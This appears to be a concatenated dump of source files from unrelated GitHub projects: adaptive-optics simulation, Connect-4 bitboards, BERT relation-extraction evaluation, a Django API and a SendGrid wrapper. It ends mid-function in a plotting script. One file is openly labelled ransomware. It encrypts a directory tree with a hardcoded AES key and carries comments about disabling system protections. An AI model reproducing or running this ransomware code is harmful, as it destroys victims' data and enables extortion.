self.phase_buffer = np.moveaxis(self.telescope.src.phase_no_pupil,-1,0)
def compute_diffractive_signals():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.lenslet_propagation_geometric)(i) for i in self.phase_buffer)
return Q
maps = compute_diffractive_signals()
self.signal_2D = np.asarray(maps)/self.slopes_units
self.signal = self.signal_2D[:,self.valid_slopes_maps].T
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% WFS PROPERTIES %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
@property
def is_geometric(self):
return self._is_geometric
@is_geometric.setter
def is_geometric(self,val):
self._is_geometric = val
if hasattr(self,'isInitialized'):
if self.isInitialized:
print('Re-initializing WFS...')
self.initialize_wfs()
@property
def lightRatio(self):
return self._lightRatio
@lightRatio.setter
def lightRatio(self,val):
self._lightRatio = val
if hasattr(self,'isInitialized'):
if self.isInitialized:
print('Selecting valid subapertures based on flux considerations..')
self.valid_subapertures = np.reshape(self.photon_per_subaperture >= self.lightRatio*np.max(self.photon_per_subaperture), [self.nSubap,self.nSubap])
self.valid_subapertures_1D = np.reshape(self.valid_subapertures,[self.nSubap**2])
[self.validLenslets_x , self.validLenslets_y] = np.where(self.photon_per_subaperture_2D >= self.lightRatio*np.max(self.photon_per_subaperture))
# index of valid slopes X and Y
self.valid_slopes_maps = np.concatenate((self.valid_subapertures,self.valid_subapertures))
# number of valid lenslet
self.nValidSubaperture = int(np.sum(self.valid_subapertures))
self.nSignal = 2*self.nValidSubaperture
print('Re-initializing WFS...')
self.initialize_wfs()
print('Done!')
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% WFS INTERACTIONS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def __mul__(self,obj):
if obj.tag=='detector':
obj.frame = self.camera_frame
else:
print('Error light propagated to the wrong type of object')
return -1
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% END %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def show(self):
attributes = inspect.getmembers(self, lambda a:not(inspect.isroutine(a)))
print(self.tag+':')
for a in attributes:
if not(a[0].startswith('__') and a[0].endswith('__')):
if not(a[0].startswith('_')):
if not np.shape(a[1]):
tmp=a[1]
try:
print(' '+str(a[0])+': '+str(tmp.tag)+' object')
except:
print(' '+str(a[0])+': '+str(a[1]))
else:
if np.ndim(a[1])>1:
print(' '+str(a[0])+': '+str(np.shape(a[1])))
```
#### File: OOPAO/AO_modules/SPRINT.py
```python
from AO_modules.mis_registration_identification_algorithm.estimateMisRegistration import estimateMisRegistration
from AO_modules.mis_registration_identification_algorithm.computeMetaSensitivyMatrix import computeMetaSensitivityMatrix
from AO_modules.MisRegistration import MisRegistration
from AO_modules.calibration.CalibrationVault import calibrationVault
import numpy as np
class SPRINT:
def __init__(self,obj, basis, nameFolder = None, nameSystem = None, mis_registration_zero_point = None, wfs_mis_registered= None, fast_algorithm = False, n_iteration = 3):
print('Setting up SPRINT..')
# modal basis considered
self.basis = basis
# consider the case when only one signal is used
if len(basis.indexModes)==1:
self.basis.indexModes = [basis.indexModes,basis.indexModes]
self.basis.modes = np.asarray([basis.modes,basis.modes]).T
# Case where the shifts are applied in the WFS space
self.wfs_mis_registered = wfs_mis_registered
# fast version of the algorithm (WARNING: not stable)
self.fast_algorithm = fast_algorithm
# zero point for the sensitivity matrices
if mis_registration_zero_point is None:
self.mis_registration_zero_point = MisRegistration()
else:
self.mis_registration_zero_point = mis_registration_zero_point
# epsilon mis-registration for the computation of the directional gradients
self.epsilonMisRegistration = MisRegistration()
self.epsilonMisRegistration.shiftX = np.round(obj.dm.pitch /10,4)
self.epsilonMisRegistration.shiftY = np.round(obj.dm.pitch /10,4)
self.epsilonMisRegistration.rotationAngle = np.round(np.rad2deg(np.arctan(self.epsilonMisRegistration.shiftX)/(obj.tel.D/2)),4)
# folder name to save the sensitivity matrices
if nameFolder is None:
self.nameFolder_sensitivity_matrice = obj.param['pathInput'] +'/'+ obj.param['name']+'/s_mat/'
else:
self.nameFolder_sensitivity_matrice = nameFolder
# name of the system considered
if nameSystem is None:
self.name_system = ''
else:
self.name_system = nameSystem
# pre-compute the sensitivity matrices
[self.metaMatrix,self.calib_0] = computeMetaSensitivityMatrix(nameFolder = self.nameFolder_sensitivity_matrice,\
nameSystem = self.name_system,\
tel = obj.tel,\
atm = obj.atm,\
ngs = obj.ngs,\
dm_0 = obj.dm,\
pitch = obj.dm.pitch,\
wfs = obj.wfs,\
basis = basis,\
misRegistrationZeroPoint = self.mis_registration_zero_point,\
epsilonMisRegistration = self.epsilonMisRegistration,\
param = obj.param,\
wfs_mis_registrated = wfs_mis_registered)
print('Done!')
def estimate(self,obj,on_sky_slopes, n_iteration = 3):
"""
Method of SPRINT to estimate the mis-registration parameters
- obj : a class containing the different objects, tel, dm, atm, ngs and wfs
- on_sky_slopes : the wfs signal used to identify the mis-registration parameters
- n_iteration : the number of iterations to consider
example:
Sprint.estimate(obj, my_wfs_signal, n_iteration = 3)
The estimates are available using:
Sprint.mis_registration_out.shift_x ---- shift in m
Sprint.mis_registration_out.shift_y ---- shift in m
Sprint.mis_registration_out.rotation ---- rotation in degree
"""
if np.ndim(on_sky_slopes)==1:
calib_misReg_in = calibrationVault(np.squeeze(np.asarray([on_sky_slopes.T,on_sky_slopes.T]).T))
else:
calib_misReg_in = calibrationVault(on_sky_slopes)
[self.mis_registration_out ,self.scaling_factor ,self.mis_registration_buffer] = estimateMisRegistration( nameFolder = self.nameFolder_sensitivity_matrice,\
nameSystem = self.name_system,\
tel = obj.tel,\
atm = obj.atm,\
ngs = obj.ngs,\
dm_0 = obj.dm,\
calib_in = calib_misReg_in,\
wfs = obj.wfs,\
basis = self.basis,\
misRegistrationZeroPoint = self.mis_registration_zero_point,\
epsilonMisRegistration = self.epsilonMisRegistration,\
param = obj.param,\
precision = 5,\
return_all = True,\
nIteration = n_iteration,\
fast = self.fast_algorithm,\
wfs_mis_registrated = self.wfs_mis_registered,\
sensitivity_matrices = self.metaMatrix )
``` |
{
"source": "joaoavf/connect-x",
"score": 4
} |
#### File: connect-x/engine/utils.py
```python
import numpy as np
def translate_board(board):
"""Translate a 42 items flat list into a 6x7 numpy array.
Parameters:
board (list): 42 items (not nested) mapping the board (0: Empty, 1: Player 1, 2: Player 2)
Returns:
(list): 6x7 nested list mapped by (0: Empty, 1: Player 1, 2: Player 2)"""
return np.array(board).reshape(6, 7).tolist()
def connected_four(bit_board):
"""Evaluates if player bit board has made a connect 4.
Parameters:
bit_board (int): bit board representation of player pieces the game
Returns:
bool : True if the board has achieved a connect 4"""
# Horizontal check
m = bit_board & (bit_board >> 7)
if m & (m >> 14):
return True
# Diagonal \
m = bit_board & (bit_board >> 6)
if m & (m >> 12):
return True
# Diagonal /
m = bit_board & (bit_board >> 8)
if m & (m >> 16):
return True
# Vertical
m = bit_board & (bit_board >> 1)
if m & (m >> 2):
return True
# Nothing found
return False
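# Editor's note on the bit layout assumed above: each column occupies 7 bits
# (6 playable cells plus a sentinel bit on top), so a shift of 1 moves one row,
# 7 moves one column, and 6/8 follow the two diagonals.
# Worked example: bit_board = 0b1111 (four pieces stacked in one column)
# -> vertical check: m = 0b1111 & 0b0111 = 0b0111 and m & (m >> 2) = 0b1, so True.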
def get_position_mask_bitmap(board, player):
"""Transform a 6x7 board representation into bit boards.
Parameters:
board (np.array): 6x7 board mapped by (0: Empty, 1: Player 1, 2: Player 2)
player (int): player id whose pieces are extracted into the first bit board (1 or 2)
Returns:
(int, int) : (bit board of player pieces, bit board of all pieces)"""
player_pieces, mask = b'', b''
for j in range(6, -1, -1): # Start with right-most column
mask += b'0' # Add 0-bits to sentinel
player_pieces += b'0'
for i in range(0, 6): # Start with bottom row
mask += [b'0', b'1'][board[i][j] != 0]
player_pieces += [b'0', b'1'][board[i][j] == player]
return int(player_pieces, 2), int(mask, 2)
def generate_plays(mask, order_by_mid=False):
"""Generate a list with all the possible plays in a given round.
Parameters:
mask (int): binary representation (bit board) of all pieces
Returns:
List : bit value of all available plays"""
position_map = [2 ** i for i in range(49)] # List of a binary representation of individual pieces in the board
available_plays = []
for column_number in range(7):
column_values = position_map[7 * column_number: 7 * column_number + 6] # Minus extra cell on top of the board
for value in column_values:
if mask & value == 0:
available_plays.append(value)
break
if order_by_mid:
available_plays = [available_plays.pop(i // 2) for i in reversed(range(len(available_plays)))]
return available_plays
def transform_play_to_column(play):
"""Return position of the column where the play was made.
Parameters:
play (int): bit board representation of a piece
Returns:
int : column position"""
return [2 ** i for i in range(49)].index(play) // 7
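# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Minimal end-to-end check of the helpers above on an empty board; the names
# flat_board and plays are illustrative. Runs only when executed directly.
if __name__ == "__main__":
    flat_board = [0] * 42                          # empty 6x7 board as a flat list
    board = translate_board(flat_board)            # 6x7 nested list
    _, mask = get_position_mask_bitmap(board, 1)   # no pieces yet, so mask == 0
    assert mask == 0
    plays = generate_plays(mask)                   # bottom cell of each column
    assert [transform_play_to_column(p) for p in plays] == list(range(7))
    assert connected_four(0b1111) and not connected_four(0b0111)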
``` |
{
"source": "Joao-b4/ransomware-py",
"score": 3
} |
#### File: Joao-b4/ransomware-py/main.py
```python
from Crypto.Cipher import AES
from Crypto.Util import Counter
import argparse
import os
import Discover
import Crypter
#------------------
# the password can have one of the following sizes
# 128/192/256 -
# 32-character password
#------------------
HARDCODED_KEY = 'bot4BypassYourAllServersInSystem'
def get_parser():
parser = argparse.ArgumentParser(description="bot4Crypter")
parser.add_argument("-d", "--decrypt", help="decripta os arquivos [default: no]", action="store_true")
return parser
def main():
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args["decrypt"]
if decrypt:
print("""
RANSOMWARE B4
----------------------------------
DECRYPT KEY = '{}'
""".format(HARDCODED_KEY))
key = input("Enter the password > ")
else:
if HARDCODED_KEY:
key = HARDCODED_KEY
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
if not decrypt:
cryptFn = crypt.encrypt
else:
cryptFn = crypt.decrypt
init_path = os.path.abspath(os.path.join(os.getcwd(), "files"))
start_dirs = [init_path] # pass '/' to traverse the whole filesystem
for currentDIr in start_dirs:
for filename in Discover.discover(currentDIr):
Crypter.change_files(filename, cryptFn)
# overwrite the key in memory
for _ in range(100):
pass
if not decrypt:
# malicious code here
pass
# after encryption, the wallpaper could be changed
# change the icons, disable regedit, admin, BIOS secure boot, etc
if __name__ == "__main__":
main()
``` |
{
"source": "joaobarbirato/BERT-Relation-Extraction",
"score": 2
} |
#### File: src/tasks/train_funcs.py
```python
import os
import math
import torch
import torch.nn as nn
from ..misc import save_as_pickle, load_pickle
from seqeval.metrics import precision_score, recall_score, f1_score
import logging
from tqdm import tqdm
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', \
datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logger = logging.getLogger(__file__)
def load_state(net, optimizer, scheduler, args, load_best=False):
""" Loads saved model and optimizer states if exists """
base_path = "./data/"
amp_checkpoint = None
checkpoint_path = os.path.join(base_path,"task_test_checkpoint_%d.pth.tar" % args.model_no)
best_path = os.path.join(base_path,"task_test_model_best_%d.pth.tar" % args.model_no)
start_epoch, best_pred, checkpoint = 0, 0, None
if (load_best == True) and os.path.isfile(best_path):
checkpoint = torch.load(best_path)
logger.info("Loaded best model.")
elif os.path.isfile(checkpoint_path):
checkpoint = torch.load(checkpoint_path)
logger.info("Loaded checkpoint model.")
if checkpoint != None:
start_epoch = checkpoint['epoch']
best_pred = checkpoint['best_acc']
net.load_state_dict(checkpoint['state_dict'])
if optimizer is not None:
optimizer.load_state_dict(checkpoint['optimizer'])
if scheduler is not None:
scheduler.load_state_dict(checkpoint['scheduler'])
amp_checkpoint = checkpoint['amp']
logger.info("Loaded model and optimizer.")
return start_epoch, best_pred, amp_checkpoint
def load_results(model_no=0):
""" Loads saved results if exists """
losses_path = "./data/task_test_losses_per_epoch_%d.pkl" % model_no
accuracy_path = "./data/task_train_accuracy_per_epoch_%d.pkl" % model_no
f1_path = "./data/task_test_f1_per_epoch_%d.pkl" % model_no
f1_micro_path = "./data/task_test_f1_nonseq_micro_per_epoch_%d.pkl" % model_no
f1_macro_path = "./data/task_test_f1_nonseq_macro_per_epoch_%d.pkl" % model_no
test_accuracy_path = "./data/task_test_accuracy_per_epoch_%d.pkl" % model_no
precision_recall_micro_path = "./data/task_test_precision_recall_micro_per_epoch_%d.pkl" % model_no
precision_recall_macro_path = "./data/task_test_precision_recall_macro_per_epoch_%d.pkl" % model_no
report_path = "./data/task_report_per_epoch_%d.pkl" % model_no
if os.path.isfile(losses_path) and os.path.isfile(accuracy_path) and os.path.isfile(f1_path) \
and os.path.isfile(f1_micro_path) and os.path.isfile(f1_macro_path) and os.path.isfile(test_accuracy_path):
losses_per_epoch = load_pickle("task_test_losses_per_epoch_%d.pkl" % model_no)
accuracy_per_epoch = load_pickle("task_train_accuracy_per_epoch_%d.pkl" % model_no)
f1_per_epoch = load_pickle("task_test_f1_per_epoch_%d.pkl" % model_no)
f1_micro_per_epoch = load_pickle("task_test_f1_nonseq_micro_per_epoch_%d.pkl" % model_no)
f1_macro_per_epoch = load_pickle("task_test_f1_nonseq_macro_per_epoch_%d.pkl" % model_no)
test_accuracy_per_epoch = load_pickle("task_test_accuracy_per_epoch_%d.pkl" % model_no)
precision_recall_micro_per_epoch = load_pickle("task_test_precision_recall_micro_per_epoch_%d.pkl" % model_no)
precision_recall_macro_per_epoch = load_pickle("task_test_precision_recall_macro_per_epoch_%d.pkl" % model_no)
report_per_epoch = load_pickle("task_report_per_epoch_%d.pkl" % model_no)
logger.info("Loaded results buffer")
else:
losses_per_epoch, accuracy_per_epoch, f1_per_epoch, f1_micro_per_epoch, \
f1_macro_per_epoch, test_accuracy_per_epoch, precision_recall_micro_per_epoch, \
precision_recall_macro_per_epoch, report_per_epoch = [], [], [], [], [], [], [], [], []
return losses_per_epoch, accuracy_per_epoch, f1_per_epoch, f1_micro_per_epoch, \
f1_macro_per_epoch, test_accuracy_per_epoch, precision_recall_micro_per_epoch, \
precision_recall_macro_per_epoch, report_per_epoch
def evaluate_(output, labels, ignore_idx):
### ignore entries equal to ignore_idx (padding) when calculating accuracy
idxs = (labels != ignore_idx).squeeze()
o_labels = torch.softmax(output, dim=1).max(1)[1]
l = labels.squeeze()[idxs]; o = o_labels[idxs]
try:
if len(idxs) > 1:
acc = (l == o).sum().item()/len(idxs)
else:
acc = (l == o).sum().item()
except TypeError: # len() of a 0-d tensor
acc = (l == o).sum().item()
l = l.cpu().numpy().tolist() if l.is_cuda else l.numpy().tolist()
o = o.cpu().numpy().tolist() if o.is_cuda else o.numpy().tolist()
return acc, (o, l)
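# Worked example (editor's illustration): with output logits
# [[2.0, 0.1], [0.2, 1.5], [0.3, 0.4]], labels [[0], [1], [0]] and ignore_idx=-1,
# the predicted classes are [0, 1, 1]; no label is ignored, so acc = 2/3 and
# (o, l) = ([0, 1, 1], [0, 1, 0]) are returned as plain Python lists.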
def convert_cr_idx2rel(cr):
rm = load_pickle("relations.pkl")
new_cr = {}
general_metrics = ['accuracy', 'macro avg', 'weighted avg']
for gm in general_metrics:
new_cr[gm] = cr[gm]
for k, v in cr.items():
if not k in general_metrics:
new_cr[rm.idx2rel[int(k)].replace('\n', '')] = cr[k]
return new_cr  # return the report keyed by relation names
from sklearn.metrics import precision_recall_fscore_support, accuracy_score, classification_report
def evaluate_results(net, test_loader, pad_id, cuda):
logger.info("Evaluating test samples...")
acc = 0; out_labels = []; true_labels = []
net.eval()
with torch.no_grad():
for i, data in tqdm(enumerate(test_loader), total=len(test_loader)):
x, e1_e2_start, labels, _,_,_ = data
attention_mask = (x != pad_id).float()
token_type_ids = torch.zeros((x.shape[0], x.shape[1])).long()
if cuda:
x = x.cuda()
labels = labels.cuda()
attention_mask = attention_mask.cuda()
token_type_ids = token_type_ids.cuda()
classification_logits = net(x, token_type_ids=token_type_ids, attention_mask=attention_mask, Q=None,\
e1_e2_start=e1_e2_start)
accuracy, (o, l) = evaluate_(classification_logits, labels, ignore_idx=-1)
out_labels.append([str(i) for i in o]); true_labels.append([str(i) for i in l])
acc += accuracy
accuracy = acc/(i + 1)
results = {
"accuracy": accuracy,
"precision": precision_score(true_labels, out_labels),
"recall": recall_score(true_labels, out_labels),
"f1": f1_score(true_labels, out_labels)
}
# converting relation specific metrics from ids to labels
cr = convert_cr_idx2rel(classification_report(
y_true=[tl for batch in true_labels for tl in batch],
y_pred=[pl for batch in out_labels for pl in batch],
output_dict=True
))
test_accuracy = cr['accuracy']
results_non_seq_macro = {
"precision": cr['macro avg']['precision'],
"recall": cr['macro avg']['recall'],
"f1": cr['macro avg']['f1-score']
}
p_micro, r_micro, f_micro, _ = precision_recall_fscore_support(
y_true=[tl for batch in true_labels for tl in batch],
y_pred=[pl for batch in out_labels for pl in batch],
average='micro',
zero_division=0
)
results_non_seq_micro = {
"precision": p_micro,
"recall": r_micro,
"f1": f_micro
}
test_accuracy = accuracy_score(
y_true=[tl for batch in true_labels for tl in batch],
y_pred=[pl for batch in out_labels for pl in batch],
)
logger.info("***** Eval results *****")
for key in sorted(results.keys()):
# logger.info(" %s = %s", key, str(results[key]))
if key != 'accuracy':
logger.info(f'test {key}(micro, macro) = ({results_non_seq_micro[key]:.3f},{results_non_seq_macro[key]:.3f})')
else:
logger.info(f'{key} (training) = {results[key]:.3f}')
return results, results_non_seq_micro, results_non_seq_macro, test_accuracy, cr
``` |
{
"source": "joaobarbirato/EscolaApp-Web",
"score": 2
} |
#### File: EscolaApp-Web/escolaappweb_dashboard/get_api.py
```python
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.http import JsonResponse
from escolaappweb_dashboard.models import (
Turma,
Materia,
Pai,
Aluno,
get_all
)
"""
get_api
Functions that return JSON with all the data of specific models.
These APIs will be useful for the mobile application.
"""
# __queryset_to_jsondict
# formats a queryset into a dictionary to be sent as JSON
# @queryset: queryset
def __queryset_to_jsondict(queryset):
dict_all = {}
for i in range(queryset.count()):
dict_all[str(queryset[i].id)] = queryset.values()[i]
return dict_all
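# e.g. for a queryset holding objects with ids 1 and 2 the result looks like
# {"1": {<model fields>}, "2": {<model fields>}} (editor's illustration)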
# get JSON
## Turma model
def get_json_turma(request):
all_objects = get_all(Turma)
response = JsonResponse(__queryset_to_jsondict(all_objects))
response.status_code = 200
return response
## Materia model
def get_json_materia(request):
all_objects = get_all(Materia)
response = JsonResponse(__queryset_to_jsondict(all_objects))
response.status_code = 200
return response
## Pai model
def get_json_pai(request):
all_objects = get_all(Pai)
response = JsonResponse(__queryset_to_jsondict(all_objects))
response.status_code = 200
return response
## Aluno model
def get_json_aluno(request):
all_objects = get_all(Aluno)
response = JsonResponse(__queryset_to_jsondict(all_objects))
response.status_code = 200
return response
``` |
{
"source": "joaobarbosa/sendgrid-marketing-api",
"score": 3
} |
#### File: sendgrid-marketing-api/sendgridmarketingapi/campaigns.py
```python
class CampaignsManager(object):
"""Campaigns Manager - All campaign methos are available trough this class.
All methods here can raise SendGrid exceptions:
SendGridClientError, SendGridServerError
Args:
wrapper: instance of SendGridClientWrapper
"""
ENDPOINT = '/campaigns'
def __init__(self, wrapper):
self.wrapper = wrapper
def get_all_campaigns(self, limit=10, offset=0):
"""Get All Campaigns
Args:
limit: (int) Maximum number of results (SendGrid API default: 10)
offset: (int) Starting index, where 0 is the first (default: 0)
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Get-all-Campaigns-GET
"""
get = {}
if limit > 0:
get = {'limit': limit, 'offset': offset}
return self.wrapper.get(endpoint=CampaignsManager.ENDPOINT, **get)
def create_campaign(self, title, **params):
"""Create Campaign
Args:
title: (str) Campaign title (max. of 100 characters)
**params:
subject: (str) (optional) Email subject
sender_id: (int) (optional) Sender ID
list_ids: (dict) (optional) List IDs
segment_ids: (dict) (optional) Segment IDs
categories: (dict) (optional) List of categories
suppression_group_id: (int) (optional) Suppression Group ID
custom_unsubscribe_url: (str) (optional) Custom unsubscribe URL
ip_pool: (str) (optional) IP pool
html_content: (str) (optional) Email content in HTML
plain_content: (str) (optional) Email content in plain text
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Create-a-Campaign-POST
"""
params['title'] = title
return self.wrapper.post(endpoint=CampaignsManager.ENDPOINT, **params)
def update_campaign(self, campaign_id, **params):
"""Update Campaign
Note: you can only update campaigns in DRAFT mode.
Args:
campaign_id: (int) Campaign ID
**params:
title: (str) (optional) Title
subject: (str) (optional) Email subject
sender_id: (int) (optional) Sender ID
list_ids: (dict) (optional) List IDs
segment_ids: (dict) (optional) Segment IDs
categories: (dict) (optional) List of categories
suppression_group_id: (int) (optional) Suppression Group ID
custom_unsubscribe_url: (str) (optional) Custom unsubscribe URL
ip_pool: (str) (optional) IP pool
html_content: (str) (optional) Email content in HTML
plain_content: (str) (optional) Email content in plain text
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Update-a-Campaign-PATCH
"""
return self.wrapper.patch(
endpoint='%s/%d' % (CampaignsManager.ENDPOINT, campaign_id),
**params
)
def get_campaign(self, campaign_id):
"""Get All Campaigns
Args:
campaign_id: (int) Campaign ID
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#View-a-Campaign-GET
"""
return self.wrapper.get(
endpoint='%s/%d' % (CampaignsManager.ENDPOINT, campaign_id)
)
def send_campaign(self, campaign_id):
"""Send a Campaign
Args:
campaign_id: (int) Campaign ID
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Send-a-Campaign-POST
"""
return self.wrapper.post(
endpoint='%s/%d/%s' % (
CampaignsManager.ENDPOINT, campaign_id, 'schedules/now'
)
)
def schedule_campaign(self, campaign_id, timestamp):
"""Schedule a Campaign
Args:
campaign_id: (int) Campaign ID
timestamp: (int) Timestamp relative to a future date
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Schedule-a-Campaign-POST
"""
return self.wrapper.post(
endpoint='%s/%d/%s' % (
CampaignsManager.ENDPOINT, campaign_id, 'schedules'
), send_at=timestamp
)
def update_schedule_campaign(self, campaign_id, timestamp):
"""Update scheduled time of a campaing
Args:
campaign_id: (int) Campaign ID
timestamp: (int) Timestamp relative to a future date
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html
#Update-a-Scheduled-Campaign-PATCH
"""
return self.wrapper.patch(
endpoint='%s/%d/%s' % (
CampaignsManager.ENDPOINT, campaign_id, 'schedules'
), send_at=timestamp
)
def delete_campaign(self, campaign_id):
"""Delete Campaigns
Args:
campaign_id: (int) Campaign ID
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Delete-a-Campaign-DELETE
"""
return self.wrapper.delete(
endpoint='%s/%d' % (CampaignsManager.ENDPOINT, campaign_id)
)
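# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Shows how CampaignsManager is wired to SendGridClientWrapper, imported from
# this package's wrapper module as in the test suite. The API key below is a
# placeholder; the call only succeeds against a real SendGrid account.
if __name__ == "__main__":
    from sendgridmarketingapi.wrapper import SendGridClientWrapper

    wrapper = SendGridClientWrapper("YOUR-SENDGRID-API-KEY")  # placeholder key
    campaigns = CampaignsManager(wrapper)
    status, data = campaigns.get_all_campaigns(limit=5)       # GET /campaigns?limit=5&offset=0
    print(status, data)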
```
#### File: sendgrid-marketing-api/sendgridmarketingapi/wrapper.py
```python
from .exceptions import UnknownRequestMethodException
try:
    from urllib.parse import urlencode  # Python 3
except ImportError:
    from urllib import urlencode  # Python 2 fallback
import sendgrid
class API(object):
"""Workaround for using SendGrid official API client.
Args:
endpoint: string representing a valid API endpoint, like '/campaigns'
"""
def __init__(self, endpoint):
self.endpoint = endpoint
class SendGridClientWrapper(object):
"""SendGridClientWrapper - Custom client, relies on the official client
Args:
apikey: Your SendGrid API key
"""
HOST = 'https://api.sendgrid.com/v3'
(METHOD_GET, METHOD_POST, METHOD_PATCH, METHOD_DELETE) = (1, 2, 3, 4)
def __init__(self, apikey):
self.sg_client = sendgrid.SendGridAPIClient(
apikey=apikey,
host=SendGridClientWrapper.HOST
)
def _call(self, api_endpoint, method, data=None):
"""Execute request in the official client
Args:
api_endpoint: (API) instance of API class with endpoint set
method: (int) method for the request
"""
if method == SendGridClientWrapper.METHOD_GET:
return self.sg_client.get(api_endpoint)
if method == SendGridClientWrapper.METHOD_POST:
return self.sg_client.post(api_endpoint, data)
if method == SendGridClientWrapper.METHOD_PATCH:
return self.sg_client.patch(api_endpoint, data)
if method == SendGridClientWrapper.METHOD_DELETE:
return self.sg_client.delete(api_endpoint)
raise UnknownRequestMethodException('Unknown request method.')
def get(self, endpoint, **params):
"""Execute a GET request
Args:
endpoint: (str) valid API endpoint, like '/campaigns'
params: (dict) url parameters
"""
if params:
qs = urlencode(params)
endpoint = endpoint + '?' + qs
return self._call(API(endpoint), SendGridClientWrapper.METHOD_GET)
def post(self, endpoint, **params):
"""Execute a POST request
Args:
endpoint: (str) valid API endpoint, like '/campaings'
params: (dict) post data
"""
return self._call(
API(endpoint),
SendGridClientWrapper.METHOD_POST,
params
)
def patch(self, endpoint, **params):
"""Execute a PATCH request
Args:
endpoint: (str) valid API endpoint, like '/campaigns'
params: (dict) post data
"""
return self._call(
API(endpoint),
SendGridClientWrapper.METHOD_PATCH,
params
)
def delete(self, endpoint):
"""Execute a DELETE request
Args:
endpoint: (str) valid API endpoint, like '/campaigns/{id}'
"""
return self._call(
API(endpoint),
SendGridClientWrapper.METHOD_DELETE
)
```
#### File: sendgrid-marketing-api/tests/test_01_wrapper.py
```python
from sendgridmarketingapi.wrapper import SendGridClientWrapper, API
from sendgridmarketingapi.exceptions import UnknownRequestMethodException
from sendgrid.exceptions import SendGridClientError
import json
import pytest
VALID_ENDPOINT = '/campaigns'
INVALID_ENDPOINT = '/invalid-endpoint'
VALID_GET_PARAMS = {'limit': 100, 'offset': 0}
class TestWrapper():
def test_instantiation_api(self):
with pytest.raises(TypeError):
API()
api = API('/endpoint')
assert api.endpoint is '/endpoint'
def test_instantiation(self, valid_api_key):
with pytest.raises(TypeError):
SendGridClientWrapper()
with pytest.raises(SendGridClientError):
wrapper = SendGridClientWrapper('wrong-key')
status, data = wrapper.get(endpoint=VALID_ENDPOINT)
response_json = json.loads(data)
assert status == 401
assert 'errors' in response_json
wrapper = SendGridClientWrapper(valid_api_key)
status, data = wrapper.get(endpoint=VALID_ENDPOINT)
assert status == 200
def test_get(self, valid_wrapper):
status, data = valid_wrapper.get(
endpoint=VALID_ENDPOINT,
params=VALID_GET_PARAMS
)
assert status == 200
with pytest.raises(SendGridClientError):
status, data = valid_wrapper.get(
endpoint=INVALID_ENDPOINT
)
assert status == 404
def test_call_unknown_request(self, valid_api_key):
wrapper = SendGridClientWrapper(valid_api_key)
with pytest.raises(UnknownRequestMethodException):
wrapper._call(api_endpoint=VALID_ENDPOINT, method=99)
``` |
{
"source": "JoaoBatistaJr/Cuso-Intensivo-de-Python-Projeto-Pygame-Aliens",
"score": 4
} |
#### File: JoaoBatistaJr/Cuso-Intensivo-de-Python-Projeto-Pygame-Aliens/bullet.py
```python
import pygame
from pygame.sprite import Sprite
class Bullet(Sprite):
"""Uma classe que administra projéteis disparados pela espaçonave"""
def __init__(self, ai_game):
"""Cria um objeto para o projétil na posição atual da espaçonave."""
super().__init__()
self.screen = ai_game.screen
self.settings = ai_game.settings
self.color = self.settings.bullet_color
# Create a rect for the bullet at (0, 0) and then set
# the correct position
self.rect = pygame.Rect(0, 0, self.settings.bullet_width,
self.settings.bullet_height)
self.rect.midtop = ai_game.ship.rect.midtop
# Store the bullet's position as a decimal value
self.y = float(self.rect.y)
def update(self):
"""Move o projétil para cima na tela."""
# Atualiza a posição decimal do projétil
self.y -= self.settings.bullet_speed
# Update the rect position
self.rect.y = self.y
def draw_bullet(self):
"""Desenha o projétil na tela."""
pygame.draw.rect(self.screen, self.color, self.rect)
``` |
{
"source": "joaobcampos/article",
"score": 3
} |
#### File: build/bin/read_data.py
```python
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
def plot_info(full_data, x_axis, y_axis):
kys = full_data.keys()
colors = cm.rainbow(np.linspace(0,1, len(kys)))
clr = 0
for i in kys:
plt.scatter(full_data[i][x_axis], full_data[i][y_axis], label=i,
color=colors[clr])
clr = clr + 1
plt.xlabel(x_axis)
plt.ylabel(y_axis)
plt.legend()
#plt.show()
plt.savefig(y_axis.strip() + '.png')
plt.close()
def main():
df = pd.read_csv("data.csv");
print(df)
column_names = list(df)
methods = pd.unique(df[column_names[0]])
noise_levels = pd.unique(df[column_names[1]])
print("column names")
print(column_names)
print("methods")
print(methods)
print("noise levels")
print(noise_levels)
statistical_info = {}
for i in methods:
new_info = pd.DataFrame(columns=column_names[1:(len(column_names))])
for j in noise_levels:
